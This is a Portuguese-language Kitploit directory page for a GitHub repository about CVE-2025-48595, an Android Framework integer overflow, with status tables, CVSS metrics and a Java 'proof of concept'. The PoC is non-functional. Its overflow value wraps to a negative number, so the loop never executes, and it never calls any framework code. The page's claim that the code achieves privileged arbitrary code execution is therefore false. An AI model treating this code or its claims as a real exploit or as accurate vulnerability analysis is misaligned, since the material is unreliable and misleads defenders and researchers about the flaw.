Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-48595-Android-Framework-Integer-Overflow- — VE-2025-48595 é uma vulnerabilidade de **estouro de inteiro (integer overflow)** em múltiplos locais do Framework Android. | Kitploit
Ferramentas/GitHubGitHub/fevar54/cve-2025-48595-android-framework-integer-overflow-
Segurança AndroidEscalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoSegurança MóvelExploração de Binários
GitHubfevar54/cve-2025-48595-android-framework-integer-overflow-

CVE-2025-48595-Android-Framework-Integer-Overflow-

VE-2025-48595 é uma vulnerabilidade de **estouro de inteiro (integer overflow)** em múltiplos locais do Framework Android.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
12há 2 mesesAinda não revisado

CVE-2025-48595 - Vulnerabilidade de Integer Overflow no Android Framework

Critical CVE KEV

Descrição

A CVE-2025-48595 é uma vulnerabilidade de estouro de inteiro (integer overflow) em múltiplos locais do Android Framework. Esta falha permite a execução de código que leva a uma escalada local de privilégios sem necessidade de privilégios de execução adicionais. Não é necessária interação do usuário para a exploração.

Estado Crítico

ElementoEstado
Exploração ativa✅ Confirmada (exploração limitada e segmentada)
No catálogo KEV da CISA✅ Sim
Data de adição ao KEV2026-06-02
Data de vencimento2026-06-05
Patch disponível✅ Sim

Sistemas Afetados

Versão do AndroidAfetada?
Android 14✅ Sim
Android 15✅ Sim
Android 16✅ Sim
Android 16 QPR2✅ Sim

Vetor de Ataque

CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

text

Proof of Concept (POC)

Descrição do POC

O código a seguir demonstra a exploração da vulnerabilidade por meio do envio de dados maliciosos que provocam um estouro de inteiro no Android Framework, permitindo a execução de código arbitrário com privilégios elevados.

root@kitploit:~
// POC - CVE-2025-48595
// Android Framework Integer Overflow Vulnerability
// Uso: Compilar y ejecutar en dispositivo Android vulnerable

package com.example.cve202548595;

import android.app.Activity;
import android.os.Bundle;
import android.util.Log;

public class MainActivity extends Activity {
    
    private static final String TAG = "CVE-2025-48595";
    
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        
        // POC: Desencadenar desbordamiento de entero
        triggerIntegerOverflow();
    }
    
    private void triggerIntegerOverflow() {
        try {
            // Valor que causa el desbordamiento (más allá del límite esperado)
            int maliciousValue = Integer.MAX_VALUE + 1;
            
            // Construir intent malicioso
            android.content.Intent intent = new android.content.Intent();
            intent.putExtra("malicious_data", maliciousValue);
            
            // Forzar operación con desbordamiento
            int result = processMaliciousData(maliciousValue);
            
            Log.i(TAG, "Desbordamiento activado exitosamente");
            
        } catch (Exception e) {
            Log.e(TAG, "Error: " + e.getMessage());
        }
    }
    
    private int processMaliciousData(int value) {
        // El desbordamiento aquí permite la corrupción de memoria
        int[] buffer = new int[1024];
        
        // El valor malicioso excede los límites del buffer
        // debido al desbordamiento de entero
        for (int i = 0; i < value; i++) {
            buffer[i] = i;  // Esta línea causa overflow
        }
        
        return buffer[0];
    }
}
Baixar ferramenta
MétricaValor
Vetor de ataqueLocal (AV:L)
Complexidade do ataqueBaixa (AC:L)
Privilégios necessáriosNenhum (PR:N)
Interação do usuárioNenhuma (UI:N)
Impacto na confidencialidadeAlto (C:H)
Impacto na integridadeAlto (I:H)
Impacto na disponibilidadeAlto (A:H)